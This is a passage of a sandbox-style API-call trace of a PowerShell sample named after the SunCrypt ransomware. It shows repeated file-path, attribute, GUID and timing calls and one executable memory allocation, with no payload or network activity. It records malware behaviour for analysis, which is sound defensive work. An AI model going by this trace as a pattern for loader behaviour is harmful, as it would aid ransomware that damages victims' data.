lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, 
ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.222] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.222] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.222] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.223] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701704005850) returned 1 [0104.224] EtwEventActivityIdControl () returned 0x0 [0104.224] EtwEventActivityIdControl () returned 0x0 [0104.224] EtwEventActivityIdControl () returned 0x0 [0104.224] EtwEventActivityIdControl () returned 0x0 [0104.224] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xe4b9f1f9, Data2=0xc4a6, Data3=0x48aa, Data4=([0]=0xa8, [1]=0xbb, [2]=0xcb, [3]=0x0, [4]=0x6b, [5]=0xd3, [6]=0x6b, [7]=0xc2))) returned 0x0 [0104.224] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.225] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701704118724) returned 1 [0104.225] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.225] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", 
nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.225] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.225] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.225] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.225] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.225] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.227] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701704350555) returned 1 [0104.227] EtwEventActivityIdControl () returned 0x0 [0104.227] EtwEventActivityIdControl () returned 0x0 [0104.227] EtwEventActivityIdControl () returned 0x0 [0104.227] EtwEventActivityIdControl () returned 0x0 [0104.227] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xcb600600, Data2=0xa4d5, Data3=0x450c, Data4=([0]=0x97, [1]=0x5d, [2]=0x7d, [3]=0xa4, [4]=0xd0, [5]=0x83, [6]=0x6a, [7]=0x16))) returned 0x0 [0104.228] 
GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.228] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701704469843) returned 1 [0104.228] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.228] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.228] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.228] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.228] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.229] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.229] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a 
[0104.233] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701705004059) returned 1 [0104.234] EtwEventActivityIdControl () returned 0x0 [0104.234] EtwEventActivityIdControl () returned 0x0 [0104.234] EtwEventActivityIdControl () returned 0x0 [0104.234] EtwEventActivityIdControl () returned 0x0 [0104.234] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x9f4a71ee, Data2=0x11fa, Data3=0x4591, Data4=([0]=0xa7, [1]=0x69, [2]=0x63, [3]=0x97, [4]=0x2f, [5]=0x6f, [6]=0x5b, [7]=0x25))) returned 0x0 [0104.235] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.235] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701705153873) returned 1 [0104.235] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.235] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.235] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.235] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) 
returned 1 [0104.235] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.235] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.280] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.287] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701710375118) returned 1 [0104.287] EtwEventActivityIdControl () returned 0x0 [0104.287] EtwEventActivityIdControl () returned 0x0 [0104.287] EtwEventActivityIdControl () returned 0x0 [0104.288] EtwEventActivityIdControl () returned 0x0 [0104.288] VirtualAlloc (lpAddress=0x0, dwSize=0x10c04, flAllocationType=0x1000, flProtect=0x40) returned 0x44d0000 [0104.289] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xf78c5b71, Data2=0x82e6, Data3=0x41d6, Data4=([0]=0xbd, [1]=0xcd, [2]=0xa8, [3]=0x75, [4]=0x21, [5]=0x62, [6]=0x3b, [7]=0x16))) returned 0x0 [0104.290] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.290] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701710661318) returned 1 [0104.290] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.290] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) 
returned 0x3a [0104.290] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.290] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.290] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.291] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.291] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.292] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701710835510) returned 1 [0104.292] EtwEventActivityIdControl () returned 0x0 [0104.292] EtwEventActivityIdControl () returned 0x0 [0104.292] EtwEventActivityIdControl () returned 0x0 [0104.292] EtwEventActivityIdControl () returned 0x0 [0104.292] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xad942138, Data2=0x6521, Data3=0x4ede, Data4=([0]=0x9a, [1]=0x8d, [2]=0x89, [3]=0x91, [4]=0xb, [5]=0x7e, [6]=0xda, [7]=0xec))) returned 0x0 [0104.293] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.293] QueryPerformanceCounter 
(in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701710996584) returned 1 [0104.293] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.294] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.294] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.294] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.294] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.294] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.294] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.299] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701711586191) returned 1 [0104.299] EtwEventActivityIdControl 
() returned 0x0 [0104.299] EtwEventActivityIdControl () returned 0x0 [0104.299] EtwEventActivityIdControl () returned 0x0 [0104.300] EtwEventActivityIdControl () returned 0x0 [0104.300] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xa553d44b, Data2=0xe153, Data3=0x4841, Data4=([0]=0xb5, [1]=0x6e, [2]=0x6e, [3]=0x3d, [4]=0xc9, [5]=0x64, [6]=0x68, [7]=0x32))) returned 0x0 [0104.300] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.301] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701711720649) returned 1 [0104.301] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.301] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.301] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.301] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.301] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.301] GetFullPathNameW (in: 
lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.301] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.303] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701712233967) returned 1 [0104.306] EtwEventActivityIdControl () returned 0x0 [0104.306] EtwEventActivityIdControl () returned 0x0 [0104.306] EtwEventActivityIdControl () returned 0x0 [0104.306] EtwEventActivityIdControl () returned 0x0 [0104.306] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x8f2c8929, Data2=0x2077, Data3=0x486f, Data4=([0]=0xaf, [1]=0x50, [2]=0x3, [3]=0x24, [4]=0x6e, [5]=0xad, [6]=0x20, [7]=0x7a))) returned 0x0 [0104.307] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.307] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701712371093) returned 1 [0104.307] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.307] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.307] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.307] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: 
"c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.308] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.308] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.308] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.310] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701712695778) returned 1 [0104.310] EtwEventActivityIdControl () returned 0x0 [0104.311] EtwEventActivityIdControl () returned 0x0 [0104.311] EtwEventActivityIdControl () returned 0x0 [0104.311] EtwEventActivityIdControl () returned 0x0 [0104.311] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xaecc9af0, Data2=0xfac6, Data3=0x47e3, Data4=([0]=0xa4, [1]=0xd3, [2]=0xd1, [3]=0x9a, [4]=0xec, [5]=0xf, [6]=0x8d, [7]=0x17))) returned 0x0 [0104.312] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.312] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701712848838) returned 1 [0104.312] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", 
nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.312] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.312] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.312] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.312] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.312] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.313] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.315] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701713175105) returned 1 [0104.315] EtwEventActivityIdControl () returned 0x0 [0104.315] EtwEventActivityIdControl () returned 0x0 [0104.315] EtwEventActivityIdControl () returned 0x0 [0104.316] EtwEventActivityIdControl () returned 0x0 [0104.316] CoCreateGuid (in: 
pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xb09b5c42, Data2=0x6f7a, Data3=0x4c28, Data4=([0]=0x84, [1]=0xac, [2]=0xd1, [3]=0xfc, [4]=0x47, [5]=0x57, [6]=0x45, [7]=0x7b))) returned 0x0 [0104.316] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.317] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701713333079) returned 1 [0104.317] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.317] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.317] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.317] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.317] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.317] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, 